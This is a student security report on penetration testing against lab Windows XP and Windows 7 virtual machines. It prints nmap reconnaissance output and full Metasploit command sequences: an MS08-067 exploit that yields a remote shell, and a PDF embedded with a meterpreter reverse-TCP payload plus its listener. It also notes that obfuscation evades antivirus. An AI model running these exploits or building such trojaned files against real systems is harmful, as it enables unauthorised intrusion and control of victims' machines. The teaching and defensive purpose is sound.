MIEIC - SSIN (Computer Security)

Transcription

1 MIEIC - SSIN (Computer Security) Tomé Duate, Robert Kulzer Final report Group 5, T9 2011/2012 December 6, Introduction There are numerous studies on malware development over the past decade, they all show a rapidly growth over the last years. Please refer to figure 1 for one of the malware statistics. Figure 1: Number of Entries on the Google Safe Browsing Malware List Many software developers do not pay much attention on possible security flaws while developing applications. A common mistake is to think security can be implemented later on as well. But writing a robust code means to start thinking about security from the beginning to the end. 1

2 2 Goals In this project we what to create an awareness among our fellow students to write secure code by showing how software can be exploited. We want to provide knowledge on certain tools to check for vulnerabilities, starting at the network layer to the application layer. Moreover, we want explain the value of penetration testing and its crucial value for today s companies. We want to explain the general guidelines of a penetration tester [1]. 1. Pre-engagement Interactions 2. Intelligence Gathering 3. Threat Modeling 4. Vulnerability Analysis 5. Exploitation 6. Post Exploitation 7. Reporting As penetration tests are either conducted as Black box and/or White box tests, we want to explain and outline the differences between these two paradigms. Furthermore, we will provide information on noteworthy web sites to get more involved in the matter. In addition to that, there is a large variety of security tools any interested student should be aware of and may want to try. All this information will be included in this work. We intend to state the legal concerns which one has to take into account before starting a penetration test. 2

3 3 Approach The attacked machines in this demonstration are virtual machines. It is a close to real world example without harming actual machines. All the demonstration is done along the penetration guideline introduced in section goals 2. The first machine is a Windows XP standard installation with service pack 3 installed. The machine is called WinXPSP3. The other machine is a Windows 7 standard installation with service pack 1. This example should demonstrate, that even newer systems can be compromised. The machine is called Win7. In both cases the attack is in the same network as the victim, there is no Firewall, VPN, IDS, or what so ever shielding the targets. 3.1 Metasploit Many penetration testers use security frameworks for their work. They provide a more convenient and efficient way to manage scans and vulnerabilities. Thanks to security frameworks, certain tasks can be performed much faster. Metasploit is such a framework [2], it is open-source and is used to retrieve information on vulnerabilities on targeted systems. 3.2 Other software Armitage is a GUI to the Metasploit framework [3] nmap is a free and open source utility for network exploration or security auditing [4] whois stores registered users or assignees of an Internet resource (like domain name, IP address, and so on) host a DNS lookup utility. telnet a network protocol to connect to specified ports on a remote host and many more... 4 Getting in touch with the target 4.1 Pre-engagement Interactions The Penetration Tester s Guide [1] defines this stage as the negotiation point. Here the security engineer and a the client meet and discuss the terms of the security evaluation. The point of this contract is to define the goal of the endeavour. Furthermore the penetration tester may decide for Black box and/or White box test. The Black box test is performed without knowledge of the internal structure/routines of the targeted system. They are mainly used to test if the specifications are implemented in the way they are 3

4 meant to be. In manners of penetration testing, this test is considered a real world example. On the contrary is the White box test, here the internals are known. Thus, the penetration tester can launch more wide scale tests against a system from the inside. This approach simulates an malicious actor from the inside, who has the authorization to access sensitive areas which are guarded by various mechanisms. The hybrid method, sometimes refereed to as Grey box testing assumes the security engineer as some knowledge on the internals, but does not have credentials to obtain higher security clearance. This level can be achieved after gathering intelligence on the targeted system, while still be at a basic user level. According to the company policies, it may be interesting to keep the employees (also IT department) unaware of a penetration test. Figure 2: Black and White box testing 4.2 Intelligence Gathering In this stage the penetration tester is trying to gather as much information on the targeted system as possible. The more information he gathers, the more elaborate his attacks/results can be. Common techniques are fingerprinting on hosts, Google hacking, social engineering and so on. The security engineer wants to identify the defence systems within the network, such as Intrusion Detection Systems (IDS) [6], Firewalls, Honeypots [5] and such. Depending on the strategy, the penetration tester may want to be as noisy as possible to attract attention or silent to stay undetected from the radar of the defence systems. He could also try to combine those strategies to distract the defence systems from the actual attack using different IP ranges and heavy port scans. There are numerous scenarios to perform the penetration testing. The attacker may select appropriate measures depending on the given configuration of the network. # nmap ss PN WinXPSP3 S t a r t i n g Nmap 5.21 ( http : / /nmap. org ) Nmap scan r e p o r t f o r WinXPSP3 Host i s up ( s l a t e n c y ). Not shown : 997 c l o s e d p o r t s PORT STATE SERVICE 135/ t c p open msrpc 139/ tcp open netbios ssn 4

5 445/ tcp open microsoft ds MAC Address : 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : B6 (Cadmus Computer Systems ) Listing 1: Default nmap scan on single host In a very basic nmap scan on WinXPSP3 (refer to listing 1 the output provides information on the open ports. This gives him a basic idea which services on a machine are running and have possible flaws. The option -ss uses TCP SYN as connection attempt (no actual connection is established) and -PN skips host discovery assuming host as online. These to switches provide a very basic method to stay a little bit more silent. If nmap would be used without any options, a connection would be established, hence the scanned hosts process would most certainly be aware of a connection attempt. There are more elaborate approaches to minimize the noise. With so called TCP idle scan the attacker can spoof a a IP address of another host in the network. Thus, he can evade detection. In order to perform this method, one has to identify hosts in the network who incremental IP ID (packet fragment identification number) enabled. The metasploit framework comes with such a scanner. The action is shown in listing 2. msf > use a u x i l i a r y / scanner / ip / i p i d s e q msf a u x i l i a r y ( i p i d s e q ) > s e t RHOSTS / 2 4 msf a u x i l i a r y ( i p i d s e q ) > s e t THREADS 50 msf a u x i l i a r y ( i p i d s e q ) > run [ ] Scanned 045 o f 256 h o s t s (017% complete ) [ ] Scanned 086 o f 256 h o s t s (033% complete ) [ ] Scanned 095 o f 256 h o s t s (037% complete ) [ ] s IPID sequence c l a s s : Incremental!... [ ] A u x i l i a r y module e x e c u t i o n completed msf a u x i l i a r y ( i p i d s e q ) > nmap PN s I WinXPSP3 Listing 2: Metasploit TCP idle scan Listing 2 shows that the host with IP address is a valid candidate for TCP idle scan. The option -si tells nmap that the following hostname or IP address is a so called zombie host, used for the scan. Listing 3 shows another useful option of nmap -A to gather more information on a target system. Not just the fingerprint of the OS running on the target, but also if there are routers in between (HOP = 1). # nmap ss PN A WinXPSP3 S t a r t i n g Nmap 5.21 ( http : / /nmap. org ) at :59 WET Nmap scan r e p o r t f o r WinXPSP3 Host i s up ( s l a t e n c y ). Not shown : 997 c l o s e d p o r t s PORT STATE SERVICE VERSION 135/ tcp open msrpc M i c r o s o f t Windows RPC 139/ tcp open netbios ssn 445/ tcp open microsoft ds M i c r o s o f t Windows XP microsoft ds 5

6 MAC Address : 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : B6 (Cadmus Computer Systems ) Device type : g e n e r a l purpose Running : M i c r o s o f t Windows XP OS d e t a i l s : M i c r o s o f t Windows XP SP2 or SP3 Network Distance : 1 hop S e r v i c e I n f o : OS: Windows Host s c r i p t r e s u l t s : n b s t a t : NetBIOS name : HACKME, NetBIOS user : <unknown>, NetBIOS MAC: 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : smb os d i s c o v e r y : OS: Windows XP ( Windows 2000 LAN Manager ) Name : WORKGROUP\HACKME System time : : 5 9 : 3 8 UTC+1 smbv2 enabled : Server doesn t support SMBv2 p r o t o c o l HOP RTT ADDRESS ms OS and S e r v i c e d e t e c t i o n performed. Listing 3: Nmap OS discovery But there is not just nmap as a tool to gather information on the network and the hosts. Classic UNIX tools like whois, host and ethercap, but also capable network sniffers like wireshark [7] and openvas [8] to serve the penetration tester on gathering intelligence. In listing 4 the whois output of up.pt is shown. This information does at first glance not seem to be of any value to a penetration tester. But the mail server and DNS addresses could be already identified, without even making contact with any of the up.pt hosts. These informations are especially vital, if a security engineer is to evaluate in a Black box scenario. # host t mx up. pt up. pt mail i s handled by 20 r e l a y 2. up. pt. up. pt mail i s handled by 10 r e l a y 1. up. pt. # whois up. pt T i t u l a r / R e g i s t r a n t Universidade do Porto R e i t o r i a P r a a Gomes T e i x e i r a Porto Porto contacto dnsup@reit. up. pt.... Nameserver Information Nameserver : up. pt NS dns1. up. pt.... Nameserver : dns3. up. pt. A Nameserver : dns4. up. pt. A

7 ... Nameserver : dns3. up. pt. AAAA : : : b10 : : Listing 4: Host and whois queries on up.pt 5 Pin-point the target system 5.1 Threat Modeling In this stage the attacker will isolate the most promising approach. He will try to look for the most effective attack according to the given specifications made in section Pre-engagement Interactions 4.1. Here the penetration tester works as an adversary would try to penetrate the system. The identification of vulnerabilities and security flaws in a system is not an easy task. As in the previous section 4.2 explained, the attacker has to operate cautiously. The security engineer knows about which ports are open. Now he wants to learn more about which software uses this port and which version of this program. Listing 5 shows an example how to identify a web server software and it s version. The output states Apache version 2.2.3, as well the server runs on Linux with the SuSE Linux distribution. This output can be cross checked with the findings from OS fingerprinting. # t e l n e t www. f e. up. pt 80 Trying Connected to s i f e u p. f e. up. pt ( ). Escape c h a r a c t e r i s ˆ ]. GET / index. html HTTP/ 1.1 HTTP/ Bad Request Date : Sat, 12 Nov : 2 5 : 3 4 GMT Server : Apache / ( Linux /SUSE) Content Length : 226 Connection : c l o s e Content Type : t e x t /html ; c h a r s e t=i s o Listing 5: Determine the web server version Having this information, the attacker may proceed to web pages like to obtain informations on recently discovered vulnerabilities in Apache version or he could search with metasploit. Yet another way to discover vulnerabilities is to use nmap scripts. Nmap can also scan for certain vulnerabilities on hosts. Moreover, the nmap script engine (NSE) [10] can be easily developed by users and are publicly available. Listing 6 shows an smb scan on a WinXPSP3. The output yields a MS08-67 vulnerability [9]. This critical flaw allows remote code execution. This attack provides the attacker to gain remote access, hence compromising the entire system. # nmap A ss PN WinXPSP3 s c r i p t=smb check vulns... 7

8 NSE: S c r i p t Scanning completed. Nmap scan r e p o r t f o r WinXPSP3 Host i s up ( s l a t e n c y ).... Device type : g e n e r a l purpose Running : M i c r o s o f t Windows XP OS d e t a i l s : M i c r o s o f t Windows XP SP2 or SP3 Network Distance : 1 hop S e r v i c e I n f o : OS: Windows Host s c r i p t r e s u l t s : smb check vulns : MS08 067: LIKELY VULNERABLE Conficker : L i k e l y CLEAN r e g s v c DoS : CHECK DISABLED SMBv2 DoS (CVE ): CHECK DISABLED Listing 6: Nmap smb vulnerability scan 5.2 Vulnerability Analysis Is concerned with the question on how to gain access to the system. In this stage the security engineer puts his data together he gathered up to this point to develop to most effective method to execute the attack. As for this work, we select the MS exploit, as it grants total access to the system. 6 Exploitation Process 6.1 Exploitation After careful planing and information gathering the actual attack can be carried out. Unlike as in section Intelligence Gathering 4.2 pointed out, the attacker should proceed as silent as possible. Massive and random launches of exploits are usually not the way to go in this stage. Listing 7 shows how easily remote access can be obtained using the metasploit framework. In this scenario the command-line version of metasploit is used. At first, the IPv4 address of the attackers machine is set. The payload is the remote code which will be executed abusing the vulnerability. In this case the payload is a remote shell listening on port 4444 on the victims machine. In the next step, the MS vulnerability is searched, via the search engine provided by the metasploit framework. After locating the right vulnerability, it s being loaded and now the penetration tester may configure the attack further 8

9 The available parameters can be viewed by showing the options. The required fields are marked and have to be provided. After setting up all the essential parameters the actual exploit can be started. msf > s e t LHOST < Attacking machine LHOST => msf > s e t PAYLOAD windows/ s h e l l / bind tcp PAYLOAD => windows/ s h e l l / bind tcp msf > search ms Matching Modules ================ Name D i s c l o s u r e Date Rank D e s c r i p t i o n e x p l o i t /... / ms netapi g r e a t M i c r o s o f t... msf > use e x p l o i t /windows/smb/ ms netapi msf e x p l o i t ( ms netapi ) > show o p t i o n s Module o p t i o n s ( e x p l o i t /windows/smb/ ms netapi ) : Name Current S e t t i n g Required D e s c r i p t i o n RHOST yes The t a r g e t address RPORT 445 yes Set the SMB s e r v i c e port SMBPIPE BROWSER yes The pipe name... Payload o p t i o n s ( windows/ s h e l l / bind tcp ) : Name Current S e t t i n g Required D e s c r i p t i o n EXITFUNC thread yes Exit technique : seh,... LPORT 4444 yes The l i s t e n port RHOST no The t a r g e t address Exploit t a r g e t : Id Name 0 Automatic Targeting msf e x p l o i t ( ms netapi ) > s e t RHOST WinXPSP3 RHOST => WinXPSP3 9

10 msf e x p l o i t ( ms netapi ) > s e t t a r g e t 6 t a r g e t => 6 msf e x p l o i t ( ms netapi ) > e x p l o i t [ ] Started bind handler [ ] Attempting to t r i g g e r the v u l n e r a b i l i t y... [ ] Sending s t a g e (240 bytes ) to WinXPSP3 [ ] Command s h e l l s e s s i o n 1 opened ( : > WinXPSP3: ) at M i c r o s o f t Windows XP [ Version ] (C) Copyright M i c r o s o f t Corp. C: \WINDOWS\ system32> Listing 7: Getting remote shell after MS exploit There are of course numerous payloads to be used. One of the most intriguing one is Meterpreter [11], this payload enables the penetration tester to a wide range of tools and mechanisms to control the client. As the attacker may want to use one or more of the compromised systems as a platform for further attacks inside the network Meterpreter can be a valuable asset to keep control of the attacked systems Meterpreter It is short for Meta-Interpreter, a advanced payload for the Metasploit framework. It provides a much easier way to richer feature set for the framework. The alternative would be much assembly code which can be very exhausting. To stay undetected, Meterpreter operates only in memory, thus staying undetected. Figures 3 and 4 show the interface of Armitage. 6.2 Using application exploits Nowadays, operating systems are no longer the main target of malware developers [12]. Injection, XSS and miss configured session management are much more pressing topics for security engineers. In addition to that, social engineering is still one of the most effective ways to compromise a system. Here is an example on embedding malicious code in a benign looking pdf file. When the file is opened with Adobe Reader [13] (version 8.x and 9.x) it executes the malicious code Malicious pdf Listing 8 shows the way to create a malicious pdf file, using the Metasploit framework to embed code in a originally legitimate document. 10

11 Figure 3: Armitage interface, after scanning the network Figure 4: Meterpreter session opened after compromising Win7 msf > search adobe pdf embedded 11

12 Matching Modules... msf > use e x p l o i t /windows/ f i l e f o r m a t / adobe pdf embedded exe msf... > s e t FILENAME <output path >/buhu m. pdf FILENAME => <output path >/buhu m. pdf msf... > s e t INFILENAME <input path>/iptablesflowchart. pdf INFILENAME => <input path >/IPTablesFlowChart. pdf msf... > s e t LAUNCH MESSAGE Foobar LAUNCH MESSAGE => Foobar msf... > s e t LHOST LHOST => msf... > show o p t i o n s Module o p t i o n s ( e x p l o i t /windows/ f i l e f o r m a t / adobe pdf embedded exe ) : Name Current S e t t i n g EXENAME FILENAME <output path>/buhu m. pdf INFILENAME <input path>/iptablesflowchart. pdf LAUNCH MESSAGE Foobar Payload o p t i o n s ( windows/ meterpreter / r e v e r s e t c p ) : Name Current S e t t i n g Required D e s c r i p t i o n EXITFUNC p r o c e s s yes Exit technique : seh,... LHOST yes The l i s t e n address LPORT 4444 yes The l i s t e n port... msf e x p l o i t ( adobe pdf embedded exe ) > e x p l o i t [ ] Reading i n < input path >/IPTablesFlowChart. pdf... [ ] Parsing <input path>/iptablesflowchart. pdf... [ ] Parsing S u c c e s s f u l. [ ] Using windows/ meterpreter / r e v e r s e t c p as payload... [ ] Creating <output path>/buhu m. pdf f i l e... [+] <output path>/buhu m. pdf... Listing 8: Embedding malicious code in a pdf file using Metasploit The hard part of the penetration testers work is now to convince a victim to open this document in Adobe Reader, which has this vulnerability. Before the victim opens the document, the attacker have to make sure, that a connection handler is waiting for incoming connections, see listing 9. msf e x p l o i t ( adobe pdf embedded exe ) > use e x p l o i t / multi / handler 12

13 msf e x p l o i t ( handler ) > s e t PAYLOAD windows/ meterpreter / r e v e r s e t c p PAYLOAD => windows/ meterpreter / r e v e r s e t c p msf e x p l o i t ( handler ) > s e t LHOST LHOST => msf e x p l o i t ( handler ) > e x p l o i t [ ] Started r e v e r s e handler on : [ ] S t a r t i n g the payload handler... Listing 9: Generate a generic listener using Metasploit After completing these steps, the penetration tester should see the incoming connection. Please refer to figure 5 to see Meterpreter with Armitage in action. Figure 5: Taking a screenshot from the running compromised machine However, this is a rather simple approach. This attempt would most certainly fail, if the machine would use a virus scanner. Checking the file with the online malware scanner virustotal.com [14] turns out that most of the virus engines can identify this malicious formed pdf document. See figure 6 for the results on the pdf. It is on the other hand not so difficult to prevent the detection by virus scan engines. Obfuscating techniques render them innocuous. 6.3 Post Exploitation After successfully compromised one or more systems, the penetration tester wants to gather valuable information and intelligence. The security engineer wants to expose the most secure systems in the network, the organization is trying to protect the most. In a software company 13

14 Figure 6: Virustotal scan on the embedded Meterpreter pdf document. this may be there repository. A bank tries to shield of their financial services. These are the systems the penetration tester is after. As it may be easier to compromise a insignificant host first, the penetration tester may use this machine then to continue for more protected systems. Here Metasploit, or more precisely Meterpreter provides options to stay on attacked machines, by for example switching the process used for attack to a other one, to stay undetected. 7 Reporting The organization who hires penetration testers expect them to reveal vulnerabilities in their networks and how they can be exploited. Hence, this stage is one of the most important. It is not just the wholes in the security systems a penetration testers uncovers, but he is also 14

15 supposed to rise the awareness of the flaws in their configuration, to hinder upcoming attacks. The security engineer will also provide solutions to the discovered vulnerabilities, and if possible to eliminate them on a broader scale. For example, if SQL injections are possible, the input for these instances should be sanitized. But the the underlining problem still remains. He may also show alternatives, if possible to eliminate this problem in total. As for the examples in this work. Most of the vulnerabilities are caused because of outdated applications. These security wholes can be closed rather easily. But there still are numerous possibilities to find entrance to a considered secure environment. 8 Conclusion Even though nowadays many companies and governments invest more money in their IT security departments, the number of news regarding compromised databases, industrial espionage and so on is still rising. Organized crime discovered the huge potential profit in online crime. But also crash kids (aka. script kiddies) and self assigned freedom fighters are a threat for data each one of us wants to protect. Penetration tests can be one instrument to unveil security flaws in networks and systems. These security engineer operate as they were hackers, but they have permission from the organization who hired them. It is most certainly not the magic formula to prevent future attacks. But it rises the level, an attacker would have to surpass, in order to gain access. Professional attackers have a business plan as well as companies. If the amount of resources invested is higher then the expected profit, they most likely will reconsider their attack plans. Hackers how attack for fun or prestige, will also spend more of their time breaking into these systems, previously tested by penetration testers. Furthermore, penetration testers can help rise awareness for vulnerabilities in software but also in social engineering. 15

16 References [1] David Kennedy, Jim O Gorman, Devon Kearns, and Mati Aharoni Metasploit - The Penetration Tester s Guide. ISBN: [2] Rapid7 LLC Metasploit Framework. [3] Raphael Mudge Cyber attack management for metasploit. [4] Gordon Lyon nmap - Discovering hosts and services on a computer network. [5] Provos, N. A virtual honeypot framework. Proceedings of the 13th conference on USENIX Security Symposium-Volume 13 (2004) [6] Rowland, C.H. Intrusion detection system (IDS). US Patent 6,405,318 [7] The Wireshark team Wireshark - The free and open-source packet analyzer. [8] Greenbone Networks GMBH OpenVAS - Framework for vulnerability scanning. [9] MS vulnerability Vulnerability in Server Service Could Allow Remote Code Execution. [10] Various developers, initially by nmap developers Nmap scripts to automate a wide variety of networking tasks. [11] Metasploit developers Meterpreter - Advanced payloads for Metasploit Framework. Meterpreter [12] Open Web Application Security Project (OWASP) OWASP is an open-source application security project. [13] Adobe Systems Adobe Reader - Used to view and print PDF files. [14] Virustotal.com - Hispasec Sistemas Free checking of suspicious files using multiple antivirus engines. 16